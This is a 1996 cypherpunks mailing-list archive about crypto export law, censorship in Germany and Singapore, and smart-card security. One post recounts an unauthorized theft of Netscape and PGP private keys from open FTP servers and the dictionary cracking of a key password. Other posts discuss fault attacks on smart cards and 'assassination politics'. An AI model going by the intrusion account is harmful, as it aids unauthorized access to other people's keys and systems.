similarity between AP and the > fictional Gort. 
> Problem is, Gort would have to be programmed. How would you write such > a program? Governments would want their hand in it. They'd insist on > "government exceptions" to rules, like: "All violence is forbidden! > (except for violence by duly authorized government employees!)" > Not very practical. Indeed it may not be practical to try such a program on current computers. I've had thoughts for some time about an analogy where each person in a civilization represents a cell in a single brain, and so on, so perhaps AP is merely a portion of the program for this "brain". As to what happens when you try to concentrate a disproportionate amount of the programming task into a few hands, that appears to be the situation we have now. From Adamsc at io-online.com Thu Sep 26 01:09:15 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 26 Sep 1996 16:09:15 +0800 Subject: A daily word of caution in reference Tim C[unt] May Message-ID: <19960926060948234.AAA88@GIGANTE> On Wed, 25 Sep 1996 18:11:22 -0400, PhneCards at aol.com wrote: >Did you know this company is using your email address as part of >an unlawful email bomb? >I would advise you to write to them at cypherpunks at toad.com >and owner-cypherpunks at toad.com and advise them to stop >using your email address for this type of activity. Hmmmm... Unlawful email bomb? My understanding is that the entire problem of spamming, which you reportedly engage in (and admitted such in another message), is at best a grey area. Otherwise you'd probably be needing that legal department to defend yourself. I'd suggest you read up on the concept of a mailing list. cypherpunks at toad.com is one of those. If you send a message there, it'll reach all 1400 people who've actually signed up (note the difference from spamming? They *requested* it!). To me it looks like you got subscribed. Send a message to majordomo at toad.com with the text of "unsubscribe cypherpunks" and you'll be removed.
Speaking of which, remove me from the list you mentioned in your other message.... >It is illegal to use a invalid return email address. Really? I must have missed the E-Mail Regulations Act of 1996 . . . Speaking of which, Reply-to: adamsc at io-online.com (Chris Adams) must be a valid address; your inane message reached me, right? >Below is the letter that I received in my email box [Deleted] Hmmmm... The message I sent to the list actually got distributed to the list. That majordomo thingie must work, after all... # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" From Adamsc at io-online.com Thu Sep 26 01:37:15 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 26 Sep 1996 16:37:15 +0800 Subject: Uses of Computational Chaos Message-ID: <19960926062611125.AAA204@GIGANTE> On Wed, 25 Sep 1996 13:46 EDT, E. Allen Smith wrote: >>Supposing, too, that you know these weaknesses, would using separate algorithms >>for different portions of the number work well? > That would seem to be a possibility; admittedly, the local copy of >AC has been checked out for the past year, so I haven't been able to take a >look at it. I'd tend to think that if you _know_ the flaw, one could come up >with a better way to deal with it than the generalized method I discussed. >For instance, if the MSB of bytes coming out of a scribble window is too low >in entropy, only use it XORed or whatever with a more-random bit. That's what I was thinking. Or possibly even replace the MSB with the MSB from another algorithm with other characteristics. Genetic programming would also be interesting here if you could write a program that would mix-n-match algorithms/seeds and gradually choose one that produces very high entropy!
# Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" From dthorn at gte.net Thu Sep 26 01:40:32 1996 From: dthorn at gte.net (Dale Thorn) Date: Thu, 26 Sep 1996 16:40:32 +0800 Subject: Public Schools In-Reply-To: Message-ID: <324A206C.44AE@gte.net> Dr.Dimitri Vulis KOTM wrote: > Phil Fraering writes: > > Without vouchers, you don't say anything about the intelligence of > > your test subjects; to a _very_ large degree, intelligence isn't > > genetic. Or > That's the political correct thing to say, but do you have any > scientific evidence to support this claim? People have argued for genetic disposition to certain things, and I think they are sometimes (most times?) confused between genetics per se (genes et al) and the way environment creates much of the being indirectly. For example, you are born with a chemical factory inside of you. The amount and timing of hormonal secretions from myriad sources inside the body has a dramatic effect on the development of the being, and environment has a dramatic effect on the amount and timing of said hormonal secretions. You can bias the formula all you want, but it can go in unpredictable directions, due to the great variety of influences. From mccoy at communities.com Thu Sep 26 01:52:07 1996 From: mccoy at communities.com (Jim McCoy) Date: Thu, 26 Sep 1996 16:52:07 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: Greg Kucharo writes: >I fail to see how the Executive can simply avoid the authority and >oversight of the Judicial. Are there other circumstances of this? From >my constitutional reading the Judiciary has the right to review any law >passed by Congress. The Executive only has the power to enforce, not to >unilaterally pass rules unrelated to enforcement. 
The executive branch cannot, but the legislative branch has the power to restrict the jurisdiction of the courts in any way it wants to except for cases in which the Supreme Court is given original jurisdiction (a limited number of situations). Ironically enough, Marshall's decision in Marbury v. Madison was that the Judicial Act of 1789 which outlined the jurisdiction of the court system was unconstitutional. It is Congress which gives the courts their jurisdiction, only the Supreme Court is given original jurisdiction in the Constitution itself (interesting side note: The case New York v. New Jersey regarding the ownership of Ellis island, I think, was the first case of original jurisdiction to be argued in the current supreme court building if that tells you how often such cases come up...) jim From dthorn at gte.net Thu Sep 26 01:53:28 1996 From: dthorn at gte.net (Dale Thorn) Date: Thu, 26 Sep 1996 16:53:28 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: Message-ID: <324A22AC.4A96@gte.net> Phil Fraering wrote: > I guess the final word on assassination politics would be obvious: > It's widely believed that the New Orleans Mafia (the source of my > recent statement about body decomposition in Louisiana swamps) was a > prime driver in the assassination of the late President John F. > Kennedy. > I think it's fairly safe to say that having done this didn't do them a > damn bit of good. It didn't do anyone else a damn bit of good. > The world remained just as corrupt as it always was. Sometimes a person just gets mad, and what can you do? Anyway, a long time ago, someone inscribed a small stone or tablet with fragments of several obscure written languages, later to be called the Rosetta Stone. The JFK assassination is a Rosetta Stone too. Dig in! From mix at squirrel.owl.de Thu Sep 26 02:07:05 1996 From: mix at squirrel.owl.de (Squirrel Remailer) Date: Thu, 26 Sep 1996 17:07:05 +0800 Subject: A periodic alert regarding Tim C.
Mayo Message-ID: <19960926053220.10997.qmail@squirrel.owl.de> Here, Tim C. Mayo descends into total inanity. He should have a cold shower and/or a Turkish coffee. From pgf at acadian.net Thu Sep 26 02:22:06 1996 From: pgf at acadian.net (Phil Fraering) Date: Thu, 26 Sep 1996 17:22:06 +0800 Subject: Medical Data In-Reply-To: Message-ID: You're absolutely correct about the informed patient bit; I have developed the policy of checking the PDR entry for any medication I take. And found out about some interactions my doctor didn't tell me about. There's a paradox about Andy Grove's situation: if he starts browsing medical databases and someone can analyze his traffic, or scans his traffic on a closed but not encrypted private email support group, they can deduce much about his condition. Now since everyone else knows about Grove's situation anyway (I suppose he talked about it) and it was brought up regarding my comments about pharmaceutical interactions (and in those comments I was acting reflexively towards a phobia about medical interactions) it's a moot point concerning the medical side and his privacy information; but the privacy angle still needs to be considered in the general case: In order for someone to do this in complete privacy, encryption would have to be ubiquitous; the norm, rather than the exception it is now. There aren't records of who looks up something in the PDR at your local library, but an ISP could gather much info about its users from what sites they frequent... Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From dlv at bwalk.dm.com Thu Sep 26 02:27:02 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 17:27:02 +0800 Subject: Newsgroup proposal: misc.anonymous In-Reply-To: Message-ID: <0HJuuD36w165w@bwalk.dm.com> "Mark M." 
writes: > In an effort to get anonymity and message pools more widespread, I think it > would be a good idea to establish a newsgroup for anonymous message pools tha > would get the same distribution as any other newsgroup in the "big 8". The > "misc" hierarchy is probably the best place for such a newsgroup since it > already carries groups like "misc.misc" and "misc.test". Does anyone have an > suggestions or objections? It should be under misc.activism: misc.activism.anonymity or even m.a.privacy. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From weber at iez.com Thu Sep 26 03:00:05 1996 From: weber at iez.com (Rolf Weber) Date: Thu, 26 Sep 1996 18:00:05 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: <199609251555.QAA00118@server.test.net> Message-ID: <9609260757.AA12338@spibm02> > > I'm trying to work up some _action_ here, any takers, German cpunks? > there was action. press releases were published, and the public prosecutor general has been informed about the technical background. latest news say that german providers stopped the blockage. i'm awaiting what happens after restoration of 'radical 154'. :-) rolf From weber at iez.com Thu Sep 26 03:05:17 1996 From: weber at iez.com (Rolf Weber) Date: Thu, 26 Sep 1996 18:05:17 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: Message-ID: <9609260751.AA12336@spibm02> > > (One German on the list has opinioned that they are 'childish' > but that doesn't say much.) > how could you define childish? i did read 'radical'. my impression was that's childish, but don't ask from me to start a discussion about it. perhaps they translate it to english, so you can see by yourself. that's the idea of free speech.
rolf From sasha1 at netcom.com Thu Sep 26 03:30:14 1996 From: sasha1 at netcom.com (Alexander 'Sasha' Chislenko) Date: Thu, 26 Sep 1996 18:30:14 +0800 Subject: CONF/ORG: EXTRO-3 date Message-ID: <3.0b26.32.19960926012027.00693d04@netcom.com> We are trying to plan the time for the EXTRO-3 - the Third in the infinite series of Extropian conferences. The tentative dates for EXTRO-3 are now weekends of August 2-3 and August 9-10 of 1997, with a backup plan of July 26-27 weekend. We would like to select the date so that it would not interfere with other conferences, and be convenient for everybody. If you know of any other events of extropian/transhumanist/libertarian/ life-extension/cypherpunk interest planned for one of those weekends, or if you would like to attend and have personal preferences for one of these days, please send me _private_ mail at sasha1 at netcom.com (You can find general info on Extropianism at http://www.primenet.com/~maxmore/extropy.htm ) On behalf of the Extropian Action Team, ------------------------------------------------------------------------- Alexander Chislenko www.lucifer.com/~sasha/home.html Firefly Network, Inc.: www.ffly.com ------------------------------------------------------------------------- From pgut001 at cs.auckland.ac.nz Thu Sep 26 05:28:24 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Thu, 26 Sep 1996 20:28:24 +0800 Subject: How to break Netscape's server key encryption - Followup Message-ID: <84373168812186@cs26.cs.auckland.ac.nz> There has been a successful hostile attack on a Netscape server key using the code I posted yesterday. I was contacted earlier today by someone who told me he had in the past obtained Netscape server keys and PGP private keys from Windows NT machines running Microsoft's insecure FTP server which allows access to the entire drive (he found some of the PGP keys using archie searches - ouch!).
He lives somewhere with nasty anti-hacking laws and definitely doesn't want his identity known, but after some pleading said I could reveal the following: - He used the cracklib dictionary to get the password - The password was found "very quickly" - The password was a female name - He deleted the server key after he'd found the password - He did it merely out of idle curiosity and has no intention of misusing the information. - He definitely doesn't want to be contacted Peter. From aaron at burn.ucsd.edu Thu Sep 26 06:51:57 1996 From: aaron at burn.ucsd.edu (Aaron) Date: Thu, 26 Sep 1996 21:51:57 +0800 Subject: Global Alert: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES Message-ID: I am writing in reference to the document, Global Alert: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES, which is available on the web as , with links to related documents and information at . I think that information about the German government's attacks on the web, and on revolutionary publications, should be propagated as widely as possible, and I encourage those who have not seen the 'Global Alert' and related documents to download and read them. I am very disturbed, however, by some of the formulations in the 'Alert', and I want to make my criticisms widely known as well, since I believe that the issues I raise are very important for defenders of free communication. I understand that others may disagree about both the correctness and importance of my criticisms. So be it. Here are the offending passages and my criticisms: >The proper response to offensive expression is more and better >expression, and prosecution of offending criminals, not censorship. This reference to 'offending criminals' seems to imply that those who create 'offensive expression' may properly be regarded as 'criminals' and prosecuted on account of that expression, in case some government has decided to criminalize such expression.
>As a result of the overly broad censorship measure which targets >an entire Internet access provider instead of a specific user This implies that censorship which targets a specific user might be alright! >Access for All, though it has expressed willingness to assist the Dutch >police in identifying online criminals abusing the xs4all system ... This is the most disturbing statement in the document. It apparently threatens to turn over users of the system to the police if they are (by whose definition?) 'online criminals abusing the xs4all system'. >Instead of the futile act of censorship ... the German government >should have acted through legal channels and asked the authorities in >the Netherlands to cooperate in determining what legal action, if any, >was appropriate. Is it appropriate to advise the German government how to carry out its attacks on left media in a less 'futile' manner? Do you want to say that the German government has a right to ask for assistance from the Dutch government in carrying out these attacks? Are you sure that the Dutch government will not, in the not-so-distant future, be willing to help them? --Aaron P.S. I am a news broadcaster and commentator with Free Radio Berkeley, a well-known unlicensed radio station. I will continue to report on this story until the German government gives up its attempts to suppress Radikal and other revolutionary publications. From adam at homeport.org Thu Sep 26 08:00:14 1996 From: adam at homeport.org (Adam Shostack) Date: Thu, 26 Sep 1996 23:00:14 +0800 Subject: Mitsubishi MISTY LSI In-Reply-To: <199609252037.UAA11310@pipe2.ny3.usa.pipeline.com> Message-ID: <199609261246.HAA03620@homeport.org> John Young wrote: | Mitsubishi Electric Corp. 
said it has developed an LSI | that can encrypt data at a speed of 450 megabits per | second, which is four times faster than any other | encryption chip developed in Japan and brings domestic | technology in line with DES, the U.S.-developed | encryption system that has become the standard in the | U.S. and Europe. It's worth noting that even if the chip is as fast as they claim (quite possible), and if it's highly key agile (less probable, but not unlikely), it may not be feasible to build devices that work at anything near that speed, due to bus issues, i/o barriers, etc. Also, in response to Bill Frantz's snake oil questions, we need to wait a few years before using it. Unfortunately, in the real world, there are people installing point to point ATM links, who need this speed today, and might choose to install as eavesdropping protection. Weak crypto, acknowledged and understood as such, can be better than plaintext. Strong crypto is obviously better, and I'll happily take pointers to vendors of 100mb ethernet, fddi or >=155mb atm crypto hardware that's available today. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From jya at pipeline.com Thu Sep 26 08:09:53 1996 From: jya at pipeline.com (John Young) Date: Thu, 26 Sep 1996 23:09:53 +0800 Subject: FLA_wed Message-ID: <199609261208.MAA13283@pipe3.ny2.usa.pipeline.com> 9-26-96. NYP: "Potential Flaw In Cash Card Security Seen. Counterfeiting a Risk, Say Bellcore Scientists." Markoff. A potential security flaw has been discovered that might make it possible to counterfeit many types of the electronic-cash "smart cards" that are now widely used in Europe and are being tested in this country, reports a paper set to be released today.
The Bellcore researchers said that a smart card's security could be breached by forcing the microchip in the card to make a calculation error, whether through sophisticated means like bombarding the card with radiation or perhaps cruder methods like placing it in a microwave oven. A mathematical formula they derived could use this error to extrapolate the secret data that authenticates the card when it is used. ----- http://jya.com/flawed.txt (6 kb) FLA_wed From dlv at bwalk.dm.com Thu Sep 26 08:19:44 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 23:19:44 +0800 Subject: More proposals for European censorship In-Reply-To: <324A17BE.4C09@gte.net> Message-ID: <1P3uuD38w165w@bwalk.dm.com> Dale Thorn writes: > I can't possibly > be doing anything illegal by logging on to this service and receiving > and posting email to cypherpunks "Practicing cryptography without a licence?" --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From rah at shipwright.com Thu Sep 26 09:29:46 1996 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 27 Sep 1996 00:29:46 +0800 Subject: 45K fine for possession Message-ID: --- begin forwarded text X-Sender: vinnie at apple.com (Unverified) Mime-Version: 1.0 Date: Wed, 25 Sep 1996 12:18:07 -0700 To: rah at shipwright.com From: Vinnie Moscaritolo Subject: 45K fine for possession Status: U http://www.nando.net/newsroom/ntn/info/092596/info13_25205.html Singapore fines first resident for Internet obscenity Copyright © 1996 Nando.net Copyright © 1996 The Associated Press SINGAPORE (Sep 25, 1996 08:48 a.m. EDT) -- A Singapore resident has been fined for downloading obscene pictures from the Internet, the first such case since the government announced it will censor what people can see on the global computer network.
Lai Chee Chuen, 41, pleaded guilty Monday to charges of collecting of pornographic pictures from the Internet and of possessing Penthouse, a magazine banned in Singapore, the Straits Times newspaper reported today. It said Lai was fined $43,900. In July, the government announced rules for censoring the Internet. By a Sept. 15 deadline, the three local Internet providers installed powerful computers blanking out some of the sites that showed prohibited pornography or anti-government material. Police seized the pictures from Lai's home in July 1995. Laws covering computer pornography have yet to be drawn up, so the government prosecuted Lai under a general law against possession of obscene visual images. Lai's conviction served to demonstrate that the government's Internet regulations are no idle threat. The Times, a pro-government newspaper, published Lai's picture on the front page to emphasize the point. Neither Lai nor police were available for comment. --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From trei at process.com Thu Sep 26 10:22:37 1996 From: trei at process.com (Peter Trei) Date: Fri, 27 Sep 1996 01:22:37 +0800 Subject: FPGAs (was: Edited Edupage, 19 Sept 1996) Message-ID: <199609261338.GAA14701@toad.com> > From: IN%"educom at educom.unc.edu" 20-SEP-1996 01:52:41.56 > > >***************************************************************** > >Edupage, 19 September 1996. Edupage, a summary of news about information > >technology, is provided three times a week as a service by Educom, > >a Washington, D.C.-based consortium of leading colleges and universities > >seeking to transform education through the use of information technology. 
> >***************************************************************** > >PROGRAMMABLE COMPUTER CHIPS > >Next month, Metalithic Systems Inc. will release a $1500 sound board called > >Digital Wings that uses field-programmable gate array computer chips that > >can be personalized, allowing the user to create and edit up to 128 > >soundtracks. When used in combination with Windows 95, Digital Wings will > >give users access to audio synthesis and editing tools comparable to those > >of a professional sound studio. (Business Week 23 Sep 96 p86) > > I wonder exactly how reprogrammable this system is... Who cares? If you want to program an FPGA, there are plenty of cheaper systems available: for example, see http://204.58.152.114/products/isa.html Peter Trei trei at process.com From brianh at u041.oh.vp.com Thu Sep 26 10:23:28 1996 From: brianh at u041.oh.vp.com (Brian Hills) Date: Fri, 27 Sep 1996 01:23:28 +0800 Subject: FW: Internet Scam TRUE? Message-ID: This lexis-nexus is running around again, is this a true statement? Or another hoax going around? I had not seen any comments on this list yet. The person who forward this to me had not provided where this originated from. Thank You b > > > > > > Subject: FW: Internet Scam > > > Date: Thursday, September 26, 1996 > > > > > > FYI > > > > > > More on the Lexis-Nexis connection: > > > > > > Subj: Internet Scam > > > > > > Many of you have probably received a message lately regarding a > > > company called Lexis which is distributing names, social security > > > numbers, etc. to people over the internet for illegal use (i.e. to obtain > > > credit in > > > your name). The message advises you to call a number, give your name and > > > social > > > security number, and they will take you off the list. > > > > > > DON'T DO THIS!! > > > > > > The scam is to have you call and give the info to them. The social > > > security office is advised of this and is investigating the company. 
From Mullen.Patrick at mail.ndhm.gtegsc.com Thu Sep 26 10:35:58 1996 From: Mullen.Patrick at mail.ndhm.gtegsc.com (Mullen Patrick) Date: Fri, 27 Sep 1996 01:35:58 +0800 Subject: How to break Netscape's server key encryption - Followup Message-ID: Could someone please repost the code referred to in this posting? I seem to have missed it, and I'm curious to see how it works. Thanks! Patrick _______________________________________________________________________________ From: pgut001 at cs.auckland.ac.nz on Thu, Sep 26, 1996 9:47 Subject: How to break Netscape's server key encryption - Followup To: cypherpunks at toad.com There has been a successful hostile attack on a Netscape server key using the code I posted yesterday. I was contacted earlier today by someone who told me he had in the past obtained Netscape server keys and PGP private keys from Windows NT machines running Microsofts insecure FTP server which allows access to the entire drive (he found some of the PGP keys using archie searches - ouch!). He lives somewhere with nasty anti-hacking laws and definitely doesn't want his identity known, but after some pleading said I could reveal the following: - He used the cracklib dictionary to get the password - The password was found "very quickly" - The password was a female name - He deleted the server key after he'd found the password - He did it merely out of idle curiosity and has no intention of misusing the information. - He definitely doesn't want to be contacted Peter. 
From pgf at acadian.net Thu Sep 26 10:47:19 1996 From: pgf at acadian.net (Phil Fraering) Date: Fri, 27 Sep 1996 01:47:19 +0800 Subject: Cuba, Iraq, AP... In-Reply-To: <199609260356.WAA00453@smoke.suba.com> Message-ID: On Wed, 25 Sep 1996, snow wrote: > Some would say that 1) Saddam (as a problem) was _created_ by the US, > and it would not be in the interest of certain people to have him die. > Along the same lines, Castro, while not exactly friendly (and who can blame > him) to the US, is also not a threat, and never really has been. Killing > him would serve no purpose.
Shortly after the Gulf War elements in the Iraqi military tried to overthrow Hussein; they apparently tried to co-ordinate with the U.S., who tried to co-ordinate with Saudi Arabia, who warned Saddam that there was going to be a coup attempt; gotta stop that Ol' power vacuum... The fact that the people who performed the Bay of Pigs were enticed into it by promised but withdrawn U.S. military support is a matter of public record; would Castro still be in power had the United States not (intentionally? I don't know) destroyed the core resistance against him in that fashion? Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From sandfort at crl.com Thu Sep 26 11:04:19 1996 From: sandfort at crl.com (Sandy Sandfort) Date: Fri, 27 Sep 1996 02:04:19 +0800 Subject: 45K fine for possession In-Reply-To: Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Wed, 25 Sep 1996, Robert Hettinga wrote: > > --- begin forwarded text > ... > Lai Chee Chuen, 41, pleaded guilty Monday to charges of collecting of > pornographic pictures from the Internet and of possessing Penthouse, a > magazine banned in Singapore, the Straits Times newspaper reported today. When I was acting for the--then government owned--Singapore Broadcasting Corporation, another actor showed me a smuggled in copy of the Asian edition of Penthouse. It cost him S$30, about US$20. As tame as it was, it was hot stuff as far as he was concerned. Apparently, the law is only enforced selectively to make a point. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From bdavis at thepoint.net Thu Sep 26 11:20:11 1996 From: bdavis at thepoint.net (Brian Davis) Date: Fri, 27 Sep 1996 02:20:11 +0800 Subject: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <9609251433.AB02026@cti02.citenet.net> Message-ID: On Wed, 25 Sep 1996, Jean-Francois Avon wrote: > On 25 Sep 96 at 5:59, Brian Davis wrote: > > > I disagree that that will be the response, but you should be willing > > to allow one group of people to fight fire with fire. > > But generally, it has been found a much better solution to fight fire > with water, and this is why I am not convinced of the ideological > effectiveness of AP, although I don't doubt it's operationnal > effectiveness at all. If by "operation effectiveness" you mean some people will be killed, I agree. I also agree with the fire/water comment (maybe in more ways than one!); my comment related to my belief that AP-supporters shouldn't complain about especially draconian measures taken against them by governments, given their modus operandi. EBD > > I will take that sentence only slightly out-of-(specific)-context and > make a still pertinent remark about it: > > This is *exactly* what Jim Bell, because of his opinions, > envision to do with the AP system. > > > I find that absolutely hilarious! > > jfa > > Please reply by e-mail since I am not on Cypherpunks anymore. > From rah at shipwright.com Thu Sep 26 11:46:06 1996 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 27 Sep 1996 02:46:06 +0800 Subject: Newsgroup proposal: misc.anonymous In-Reply-To: Message-ID: At 10:51 pm -0400 9/25/96, Mark M. wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > In an effort to get anonymity and message pools more widespread, I think it > would be a good idea to establish a newsgroup for anonymous message pools >that > would get the same distribution as any other newsgroup in the "big 8". The > "misc" hierarchy is probably the best place for such a newsgroup since it > already carries groups like "misc.misc" and "misc.test". Does anyone >have any > suggestions or objections? I do know that there was an alt.anonymous.messages, or some such. 
Haven't looked at it lately, but I don't remember too much traffic on it... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/

From tank at xs4all.nl Thu Sep 26 12:30:24 1996 From: tank at xs4all.nl (tank) Date: Fri, 27 Sep 1996 03:30:24 +0800 Subject: German ICTF stopped blocking xs4all. Radikal back online Message-ID: <199609261608.SAA24058@xs1.xs4all.nl>
Hi, On the evening of September 24th ICTF stopped blocking xs4all after we removed the pages. More information about that can be found at http://www.anwalt.de/ictf (although not much). Today we've put the radikal back on xs4all :) For more background information http://www.xs4all.nl/~felipe/germany.html henk (SPG)

From tcmay at got.net Thu Sep 26 12:59:08 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 27 Sep 1996 03:59:08 +0800 Subject: Taking crypto out of the U.S. Message-ID:
At 5:55 AM 9/26/96, Adamsc wrote: >On Wed, 25 Sep 1996 06:26:31 -0500 (EST), Adam Shostack wrote: > >>| >There's a personal use exemption. Michael Froomkin's web page has a >>| >pointer to it. > >>| What if your laptop gets "stolen"? Or you sell it for a plane ticket home >>| after your wallet gets pinched? > >>You're required to report it to the Feds. RTFU. > >Yeah, but you can't be persecuted. So what happens if Joe-Cryptographer >writes a *great* NSA-stumping crypto program - not for export - and it just >happens to get pinched (The police might even recover it!)? Outside >distribution w/o penalties... This is what judges and juries are for. Interpreting the "spirit of the law." (I feel strange defending the legal system, but in plain English: it ain't this stupid.
A defense of "I didn't give secrets to the Koreans, I was just reading these documents outside their embassy, and they blew off the bench and onto their property." won't cut it. Or, at least, I think there's a fair chance a jury would find one guilty of espionage, treason, whatever.) Now I don't think there's any real chance of being prosecuted for having a laptop lost or stolen, regardless of what it contains (unless it was true DOD secret stuff, and then the discipline would be handled internally to one's agency), but don't think for a second that this is a new "loophole" in the export laws! --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Thu Sep 26 13:19:07 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 27 Sep 1996 04:19:07 +0800 Subject: Weaknesses in Smart Cards? (Re: FLA_wed) Message-ID: Thanks, John. I read the full article. I'm skeptical. At 12:08 PM 9/26/96, John Young wrote: > 9-26-96. NYP: > > "Potential Flaw In Cash Card Security Seen. Counterfeiting > a Risk, Say Bellcore Scientists." Markoff. > The Bellcore researchers said that a smart card's > security could be breached by forcing the microchip in > the card to make a calculation error, whether through > sophisticated means like bombarding the card with > radiation or perhaps cruder methods like placing it in > a microwave oven. A mathematical formula they derived > could use this error to extrapolate the secret data that > authenticates the card when it is used. 
As the researchers note, they haven't actually done this. Having worked on radiation effects on chips, I'm skeptical that this can be done economically. Simple radiation sources won't be penetrating enough (for the high "linear energy transfer" (LET) particles needed to deposit enough energy to flip a logic state) and the penetrating stuff (betas and gammas) are low-LET and will only disrupt logic states in very high overall exposures (kilorads). A cyclotron, for example, could get some high-LET particles through the packaging to the chips. Strip-back of the outer packaging is possible, of course. I'd need to know a lot more about the packaging used by VISA and other smartcard makers to know how economical this would be. (Breaking any single card is not necessarily a financial windfall, if the card has a limit, for example. This puts a limit on how much $$$ can be spent on cracking a chip.) Also, there are electrically-erasable PROM (EEPROM) chips which are very difficult to clone, and which would have response properties to radiation which are much different from static RAMs and microprocessors. The "microwave oven" point I won't comment on. Their work on what might be called a kind of "avalanche" algorithm, where a few flaws in operation yield secrets at the output, seems interesting. However, one thing that disturbs me (and their work is not the only example) is the "press release" nature. Especially for _theoretical_ work, rather than actual demonstration! When the cracking of a 40-bit key was done about a year ago (by a couple of Cypherpunks, including the French student), it was a *real* crack, not a press release about a _possible_ attack. Likewise, the Netscape crack by Wagner and Goldberg was a *real* attack. But as the "arms race" for press releases about potential security flaws escalates, it appears people are pre-announcing results, or gussying-up potential flaws in the language of scary press releases. Not a good journalistic trend, in my opinion.
--Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway."

From azur at netcom.com Thu Sep 26 13:38:35 1996 From: azur at netcom.com (Steve Schear) Date: Fri, 27 Sep 1996 04:38:35 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID:
>Indeed it may not be practical to try such a program on current >computers. I've had thoughts for some time about an analogy where each >person in a civilization represents a cell in a single brain, and so on, >so perhaps AP is merely a portion of the program for this "brain". As >to what happens when you try to concentrate a disproportionate amount of >the programming task into a few hands, that appears to be the situation >we have now. For an excellent high-level coverage of 'hive' behaviour in man and machine see Kevin Kelly's, "Out of Control: the rise of neo-biological civilization" (also has significant coverage of us cypherpunks), Addison-Wesley, 1994, ISBN 0-201-57793-3. PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to prescription DRUGS. "Of all tyrannies, a tyranny sincerely exercised for the good of its victims may be the most oppressive." -- C.S.
Lewis "Surveillance is ultimately just another form of media, and thus, potential entertainment." -- G. Beato

From unicorn at schloss.li Thu Sep 26 13:47:41 1996 From: unicorn at schloss.li (Black Unicorn) Date: Fri, 27 Sep 1996 04:47:41 +0800 Subject: "Confessing to a felony" In-Reply-To: Message-ID:
On Wed, 25 Sep 1996, Timothy C. May wrote: > At 2:03 AM 9/26/96, Black Unicorn wrote: > >On Wed, 25 Sep 1996, Igor Chudov @ home wrote: > > > >> > >> Soon I am going to be going overseas to Japan, and I want to take > >> > >> my notebook with me so I can keep up with everything, however, I have > >> > >> encrypted my hard drive and usually encrypt my mail. Is this in > >> > >> violation of the ITAR to keep everything the same when I go over? > >> > >> Gentlemen, US customs does not give shit about what you take out > >> on your diskettes. > >> > >> When I went to Russia recently, I took PGP for DOS, and no one gave > >> me any problem. > >> > >> IANAL > > > >Obviously not, you've just confessed to a felony. > > So? > > "Confessing to a felony" is meaningless, as I understand things. While BU > is a lawyer, and I am not, I maintain "confessing to a felony" is > meaningless without several necessary factors: Mr. May is absolutely correct. But let me discuss why I still think it's dangerous. > > a. interest by law enforcement that a crime has been committed and needs to > be prosecuted Interest by law enforcement is impossible to predict. It can be driven by political winds, and by fancy as well as unlucky coincidence. (The drug dealer who is busted because the 